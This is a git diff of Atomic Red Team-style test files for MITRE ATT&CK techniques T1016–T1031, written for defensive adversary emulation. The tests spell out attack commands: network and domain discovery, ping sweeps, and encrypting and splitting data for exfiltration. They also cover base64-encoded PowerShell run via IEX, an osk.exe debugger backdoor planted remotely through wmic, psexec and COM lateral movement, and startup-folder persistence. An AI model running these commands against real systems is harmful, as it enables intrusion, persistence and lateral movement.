Adversaries will likely look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103). -Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+Adversaries may use the information +from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to +shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific +actions.
## Atomic Tests @@ -16,22 +21,18 @@ Adversaries may use the information from [System Network Configuration Discovery - [Atomic Test #5 - List Open Egress Ports](#atomic-test-5---list-open-egress-ports) -
## Atomic Test #1 - System Network Configuration Discovery + Identify network configuration information -Upon successful execution, cmd.exe will spawn multiple commands to list network configuration settings. Output will be via stdout. +Upon successful execution, cmd.exe will spawn multiple commands to list network configuration settings. Output will be +via stdout. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd ipconfig /all @@ -41,53 +42,35 @@ nbtstat -n net config ``` - - - - -

## Atomic Test #2 - List Windows Firewall Rules + Enumerates Windows Firewall Rules using netsh. Upon successful execution, cmd.exe will spawn netsh.exe to list firewall rules. Output will be via stdout. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd netsh advfirewall firewall show rule name=all ``` - - - - -

## Atomic Test #3 - System Network Configuration Discovery + Identify network configuration information. Upon successful execution, sh will spawn multiple commands and output will be via stdout. **Supported Platforms:** macOS, Linux - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh arp -a @@ -95,27 +78,20 @@ netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c ifconfig ``` - - - - -

## Atomic Test #4 - System Network Configuration Discovery (TrickBot Style) -Identify network configuration information as seen by Trickbot and described here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/ - -Upon successful execution, cmd.exe will spawn `ipconfig /all`, `net config workstation`, `net view /all /domain`, `nltest /domain_trusts`. Output will be via stdout. - -**Supported Platforms:** Windows - - +Identify network configuration information as seen by Trickbot and described +here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/ +Upon successful execution, cmd.exe will spawn `ipconfig /all`, `net config workstation`, `net view /all /domain` +, `nltest /domain_trusts`. Output will be via stdout. -#### Attack Commands: Run with `command_prompt`! +**Supported Platforms:** Windows +#### Attack Commands: Run with `command_prompt`! ```cmd ipconfig /all @@ -124,35 +100,28 @@ net view /all /domain nltest /domain_trusts ``` - - - - -

## Atomic Test #5 - List Open Egress Ports -This is to test for what ports are open outbound. The technique used was taken from the following blog: + +This is to test for what ports are open outbound. The technique used was taken from the following blog: https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-with-allports-exposed/ -Upon successful execution, powershell will read top-128.txt (ports) and contact each port to confirm if open or not. Output will be to Desktop\open-ports.txt. +Upon successful execution, powershell will read top-128.txt (ports) and contact each port to confirm if open or not. +Output will be to Desktop\open-ports.txt. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | port_file | The path to a text file containing ports to be scanned, one port per line. The default list uses the top 128 ports as defined by Nmap. | Path | PathToAtomicsFolder\T1016\src\top-128.txt| | portfile_url | URL to top-128.txt | Url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1016/src/top-128.txt| | output_file | Path of file to write port scan results | Path | $env:USERPROFILE\Desktop\open-ports.txt| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell $ports = Get-content #{port_file} @@ -184,25 +153,26 @@ Write-Host $results ``` #### Cleanup Commands: + ```powershell Remove-Item -ErrorAction ignore "#{output_file}" ``` - - #### Dependencies: Run with `powershell`! + ##### Description: Test requires #{port_file} to exist + ##### Check Prereq Commands: + ```powershell if (Test-Path "#{port_file}") {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}" ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1018.md b/Atomic_Threat_Coverage/Triggers/T1018.md index 8ddf3733..df86a161 100644 --- a/Atomic_Threat_Coverage/Triggers/T1018.md +++ b/Atomic_Threat_Coverage/Triggers/T1018.md @@ -1,22 +1,31 @@ # T1018 - Remote System Discovery + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1018) +
Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used. Adversaries may also use local host files in order to discover the hostname to IP address mappings of remote systems. ### Windows -Examples of tools and commands that acquire this information include "ping" or "net view" using [Net](https://attack.mitre.org/software/S0039). The contents of the C:\Windows\System32\Drivers\etc\hosts file can be viewed to gain insight into the existing hostname to IP mappings on the system. +Examples of tools and commands that acquire this information include "ping" or "net view" +using [Net](https://attack.mitre.org/software/S0039). The contents of the C: +\Windows\System32\Drivers\etc\hosts file can be viewed to gain insight into the existing hostname to IP mappings +on the system. ### Mac -Specific to Mac, the bonjour protocol to discover additional Mac-based systems within the same broadcast domain. Utilities such as "ping" and others can be used to gather information about remote systems. The contents of the /etc/hosts file can be viewed to gain insight into existing hostname to IP mappings on the system. +Specific to Mac, the bonjour protocol to discover additional Mac-based systems within the same broadcast +domain. Utilities such as "ping" and others can be used to gather information about remote systems. The contents of +the /etc/hosts file can be viewed to gain insight into existing hostname to IP mappings on the system. ### Linux -Utilities such as "ping" and others can be used to gather information about remote systems. The contents of the /etc/hosts file can be viewed to gain insight into existing hostname to IP mappings on the system. 
+Utilities such as "ping" and others can be used to gather information about remote systems. The contents of the +/etc/hosts file can be viewed to gain insight into existing hostname to IP mappings on the system. ### Cloud -In cloud environments, the above techniques may be used to discover remote systems depending upon the host operating system. In addition, cloud environments often provide APIs with information about remote systems and services. +In cloud environments, the above techniques may be used to discover remote systems depending upon the host operating +system. In addition, cloud environments often provide APIs with information about remote systems and services.
## Atomic Tests @@ -37,210 +46,149 @@ In cloud environments, the above techniques may be used to discover remote syste - [Atomic Test #8 - Remote System Discovery - nslookup](#atomic-test-8---remote-system-discovery---nslookup) -
## Atomic Test #1 - Remote System Discovery - net + Identify remote systems with net.exe. -Upon successful execution, cmd.exe will execute `net.exe view` and display results of local systems on the network that have file and print sharing enabled. +Upon successful execution, cmd.exe will execute `net.exe view` and display results of local systems on the network that +have file and print sharing enabled. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd net view /domain net view ``` - - - - -

## Atomic Test #2 - Remote System Discovery - net group Domain Computers + Identify remote systems with net.exe querying the Active Directory Domain Computers group. -Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Computers" group. Output will be via stdout. +Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Computers" group. +Output will be via stdout. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd net group "Domain Computers" /domain ``` - - - - -

## Atomic Test #3 - Remote System Discovery - nltest + Identify domain controllers for specified domain. -Upon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain controllers. Output will be via stdout. +Upon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain +controllers. Output will be via stdout. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_domain | Domain to query for domain controllers | String | domain.local| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd nltest.exe /dclist:#{target_domain} ``` - - - - -

## Atomic Test #4 - Remote System Discovery - ping sweep + Identify remote systems via ping sweep. -Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout. +Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via +stdout. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i ``` - - - - -

## Atomic Test #5 - Remote System Discovery - arp -Identify remote systems via arp. + +Identify remote systems via arp. Upon successful execution, cmd.exe will execute arp to list out the arp cache. Output will be via stdout. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd arp -a ``` - - - - -

## Atomic Test #6 - Remote System Discovery - arp nix + Identify remote systems via arp. Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout. **Supported Platforms:** Linux, macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh arp -a | grep -v '^?' ``` - - - - -

## Atomic Test #7 - Remote System Discovery - sweep + Identify remote systems via ping sweep. -Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active. +Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active. **Supported Platforms:** Linux, macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done ``` - - - - -

## Atomic Test #8 - Remote System Discovery - nslookup -Powershell script that runs nslookup on cmd.exe against the local /24 network of the first network adaptor listed in ipconfig. - -Upon successful execution, powershell will identify the ip range (via ipconfig) and perform a for loop and execute nslookup against that IP range. Output will be via stdout. - -**Supported Platforms:** Windows +Powershell script that runs nslookup on cmd.exe against the local /24 network of the first network adaptor listed in +ipconfig. +Upon successful execution, powershell will identify the ip range (via ipconfig) and perform a for loop and execute +nslookup against that IP range. Output will be via stdout. +**Supported Platforms:** Windows - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell $localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1] @@ -251,9 +199,4 @@ $thirdOctet = $pieces[2] foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.exe /c nslookup $ip} ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1022.md b/Atomic_Threat_Coverage/Triggers/T1022.md index e43b3c37..f4f9ac36 100644 --- a/Atomic_Threat_Coverage/Triggers/T1022.md +++ b/Atomic_Threat_Coverage/Triggers/T1022.md @@ -1,8 +1,12 @@ # T1022 - Data Encrypted + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1022) +
Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip. -Other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over Command and Control Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048)
+Other exfiltration techniques likely apply as well to transfer the information out of the network, such +as [Exfiltration Over Command and Control Channel](https://attack.mitre.org/techniques/T1041) +and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048)
## Atomic Tests @@ -14,20 +18,15 @@ Other exfiltration techniques likely apply as well to transfer the information o - [Atomic Test #4 - Compress Data and lock with password for Exfiltration with 7zip](#atomic-test-4---compress-data-and-lock-with-password-for-exfiltration-with-7zip) -
## Atomic Test #1 - Data Encrypted with zip and gpg symmetric + Encrypt data for exiltration **Supported Platforms:** macOS, Linux - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh mkdir /tmp/victim-files @@ -42,29 +41,22 @@ ls -l ``` #### Cleanup Commands: + ```sh rm -Rf /tmp/victim-files ``` - - - -

## Atomic Test #2 - Compress Data and lock with password for Exfiltration with winrar + Note: Requires winrar installation rar a -p"blue" hello.rar (VARIANT) **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd mkdir .\tmp\victim-files @@ -74,33 +66,25 @@ rar a -hp"blue" hello.rar dir ``` - - - - -

## Atomic Test #3 - Compress Data and lock with password for Exfiltration with winzip + Note: Requires winzip installation wzzip sample.zip -s"blueblue" *.txt (VARIANT) **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | winzip_exe | Path to installed Winzip executable | Path | %ProgramFiles%\WinZip\winzip64.exe| | winzip_url | Path to download Windows Credential Editor zip file | url | https://download.winzip.com/gl/nkln/winzip24-home.exe| | winzip_hash | File hash of the Windows Credential Editor zip file | String | B59DB592B924E963C21DA8709417AC0504F6158CFCB12FE5536F4A0E0D57D7FB| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd path=%path%;"C:\Program Files (x86)\winzip" @@ -111,16 +95,18 @@ echo "This file will be encrypted" > .\encrypted_file.txt dir ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: Winzip must be installed + ##### Check Prereq Commands: + ```powershell cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)' ``` + ##### Get Prereq Commands: + ```powershell if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){ Write-Host Follow the installation prompts to continue @@ -128,23 +114,16 @@ if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_h } ``` - - -

## Atomic Test #4 - Compress Data and lock with password for Exfiltration with 7zip + Note: Requires 7zip installation **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd mkdir $PathToAtomicsFolder\T1022\victim-files @@ -154,9 +133,4 @@ echo "This file will be encrypted" > .\encrypted_file.txt dir ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1023.md b/Atomic_Threat_Coverage/Triggers/T1023.md index 39176721..fb0a1fb1 100644 --- a/Atomic_Threat_Coverage/Triggers/T1023.md +++ b/Atomic_Threat_Coverage/Triggers/T1023.md @@ -1,5 +1,7 @@ # T1023 - Shortcut Modification + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1023) +
Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.
## Atomic Tests @@ -8,27 +10,24 @@ - [Atomic Test #2 - Create shortcut to cmd in startup folders](#atomic-test-2---create-shortcut-to-cmd-in-startup-folders) -
## Atomic Test #1 - Shortcut Modification -This test to simulate shortcut modification and then execute. example shortcut (*.lnk , .url) strings check with powershell; + +This test to simulate shortcut modification and then execute. example shortcut (*.lnk , .url) strings check with +powershell; gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern "exe" | FL. Upon execution, calc.exe will be launched. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | shortcut_file_path | shortcut modified and execute | path | %temp%\T1023_modified_shortcut.url| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd echo [InternetShortcut] > #{shortcut_file_path} @@ -37,29 +36,23 @@ echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path} ``` #### Cleanup Commands: + ```cmd del -f #{shortcut_file_path} >nul 2>&1 ``` - - - -

## Atomic Test #2 - Create shortcut to cmd in startup folders -LNK file to launch CMD placed in startup folder. Upon execution, open File Explorer and browse to "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\" + +LNK file to launch CMD placed in startup folder. Upon execution, open File Explorer and browse to " +%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\" to view the new shortcut. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell $Shell = New-Object -ComObject ("WScript.Shell") @@ -80,13 +73,10 @@ $ShortCut.Save() ``` #### Cleanup Commands: + ```powershell Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1023.lnk" -ErrorAction Ignore Remove-Item "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1023.lnk" -ErrorAction Ignore ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1027.md b/Atomic_Threat_Coverage/Triggers/T1027.md index c4d5759b..bc278a57 100644 --- a/Atomic_Threat_Coverage/Triggers/T1027.md +++ b/Atomic_Threat_Coverage/Triggers/T1027.md @@ -1,14 +1,35 @@ # T1027 - Obfuscated Files or Information -## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1027) -
Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. - -Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript. -Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016) +## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1027) -Adversaries may also obfuscate commands executed from payloads or directly via a [Command-Line Interface](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and whitelisting mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: PaloAlto EncodedCommand March 2017) +
Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. -Another example of obfuscation is through the use of steganography, a technique of hiding messages or code in images, audio tracks, video clips, or text files. One of the first known and reported adversaries that used steganography activity surrounding [Invoke-PSImage](https://attack.mitre.org/software/S0231). The Duqu malware encrypted the gathered information from a victim's system and hid it into an image followed by exfiltrating the image to a C2 server. (Citation: Wikipedia Duqu) By the end of 2017, an adversary group used [Invoke-PSImage](https://attack.mitre.org/software/S0231) to hide PowerShell commands in an image file (png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary. (Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)
+Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during +Initial Access or later to mitigate detection. Sometimes a user's action may be required to open +and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) +for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to +open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke +November 2016) Adversaries may also used compressed or archived scripts, such as Javascript. + +Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with +discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly +benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016) + +Adversaries may also obfuscate commands executed from payloads or directly via +a [Command-Line Interface](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and +other platform/language specific semantics can be used to evade signature based detections and whitelisting +mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: +PaloAlto EncodedCommand March 2017) + +Another example of obfuscation is through the use of steganography, a technique of hiding messages or code in images, +audio tracks, video clips, or text files. One of the first known and reported adversaries that used steganography +activity surrounding [Invoke-PSImage](https://attack.mitre.org/software/S0231). The Duqu malware encrypted the gathered +information from a victim's system and hid it into an image followed by exfiltrating the image to a C2 server. 
( +Citation: Wikipedia Duqu) By the end of 2017, an adversary group +used [Invoke-PSImage](https://attack.mitre.org/software/S0231) to hide PowerShell commands in an image file (png) and +execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script +to gather intelligence from the victim's machine and communicate it back to the adversary. (Citation: McAfee Malicious +Doc Targets Pyeongchang Olympics)
## Atomic Tests @@ -18,22 +39,18 @@ Another example of obfuscation is through the use of steganography, a technique - [Atomic Test #3 - Execute base64-encoded PowerShell from Windows Registry](#atomic-test-3---execute-base64-encoded-powershell-from-windows-registry) -
## Atomic Test #1 - Decode base64 Data into Script + Creates a base64-encoded data file and decodes it into an executable shell script -Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that stdouts `echo Hello from the Atomic Red Team`. +Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that +stdouts `echo Hello from the Atomic Red Team`. **Supported Platforms:** macOS, Linux - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat" @@ -42,32 +59,24 @@ chmod +x /tmp/art.sh /tmp/art.sh ``` - - - - -

## Atomic Test #2 - Execute base64-encoded PowerShell + Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools. Upon successful execution, powershell will execute an encoded command and stdout default is "Write-Host "Hey, Atomic!" **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell $OriginalCommand = '#{powershell_command}' @@ -77,34 +86,27 @@ $EncodedCommand powershell.exe -EncodedCommand $EncodedCommand ``` - - - - -

## Atomic Test #3 - Execute base64-encoded PowerShell from Windows Registry -Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates it for execution. This is used by numerous adversaries and malicious tools. + +Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates it for execution. This is used by +numerous adversaries and malicious tools. Upon successful execution, powershell will execute encoded command and read/write from the registry. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"| | registry_key_storage | Windows Registry Key to store code | String | HKCU:Software\Microsoft\Windows\CurrentVersion| | registry_entry_storage | Windows Registry entry to store code under key | String | Debug| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell $OriginalCommand = '#{powershell_command}' @@ -117,12 +119,9 @@ powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::From ``` #### Cleanup Commands: + ```powershell Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Name #{registry_entry_storage} ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1028.md b/Atomic_Threat_Coverage/Triggers/T1028.md
index 43d82678..40078ca4 100644
--- a/Atomic_Threat_Coverage/Triggers/T1028.md
+++ b/Atomic_Threat_Coverage/Triggers/T1028.md
@@ -1,5 +1,7 @@
# T1028 - Windows Remote Management + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1028) +
Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the winrm command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)
## Atomic Tests
@@ -14,36 +16,27 @@ - [Atomic Test #5 - Invoke-Command](#atomic-test-5---invoke-command) -
## Atomic Test #1 - Enable Windows Remote Management + Powershell Enable WinRM Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell Enable-PSRemoting -Force ``` - - - - -

## Atomic Test #2 - PowerShell Lateral Movement + Powershell lateral movement using the mmc20 application com object. Reference: @@ -54,74 +47,57 @@ Upon successful execution, cmd will spawn calc.exe on a remote computer. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | computer_name | Name of Computer | string | computer1| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") ``` - - - - -

## Atomic Test #3 - WMIC Process Call Create + Utilize WMIC to start remote process. -Upon successful execution, cmd will utilize wmic.exe to modify the registry on a remote endpoint to swap osk.exe with cmd.exe. +Upon successful execution, cmd will utilize wmic.exe to modify the registry on a remote endpoint to swap osk.exe with +cmd.exe. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_name | Username | String | DOMAIN\Administrator| | password | Password | String | P@ssw0rd1| | computer_name | Target Computer Name | String | Target| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" ``` - - - - -

## Atomic Test #4 - Psexec + Utilize psexec to start remote process. Upon successful execution, cmd will utilize psexec.exe to spawn cmd.exe on a remote system. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_name | Username | String | DOMAIN\Administrator| @@ -129,24 +105,24 @@ Upon successful execution, cmd will utilize psexec.exe to spawn cmd.exe on a rem | computer_name | Target Computer Name | String | localhost| | psexec_exe | Path to PsExec | string | C:\PSTools\PsExec.exe| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd #{psexec_exe} \\#{computer_name} -u #{user_name} -p #{password} -s cmd.exe ``` - - - #### Dependencies: Run with `command_prompt`! + ##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) + ##### Check Prereq Commands: + ```cmd if (Test-Path "#{psexec_exe}"") { exit 0} else { exit 1} ``` + ##### Get Prereq Commands: + ```cmd Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -154,39 +130,28 @@ New-Item -ItemType Directory ("#{psexec_exe}") -Force | Out-Null Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force ``` - - -

## Atomic Test #5 - Invoke-Command + Execute Invoke-command on remote host. Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | host_name | Remote Windows Host Name | String | localhost| | remote_command | Command to execute on remote Host | String | ipconfig| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}} ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1030.md b/Atomic_Threat_Coverage/Triggers/T1030.md
index 7e15333b..2e6a7132 100644
--- a/Atomic_Threat_Coverage/Triggers/T1030.md
+++ b/Atomic_Threat_Coverage/Triggers/T1030.md
@@ -1,25 +1,22 @@
# T1030 - Data Transfer Size Limits + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1030) +
An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.
## Atomic Tests - [Atomic Test #1 - Data Transfer Size Limits](#atomic-test-1---data-transfer-size-limits) -
## Atomic Test #1 - Data Transfer Size Limits + Take a file/directory, split it into 5Mb chunks **Supported Platforms:** macOS, Linux - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh cd /tmp/ @@ -28,9 +25,4 @@ split -b 5000000 /tmp/victim-whole-file ls -l ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1031.md b/Atomic_Threat_Coverage/Triggers/T1031.md
index c7a696c4..09ca0a9e 100644
--- a/Atomic_Threat_Coverage/Triggers/T1031.md
+++ b/Atomic_Threat_Coverage/Triggers/T1031.md
@@ -1,19 +1,26 @@
# T1031 - Modify Existing Service + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1031) +
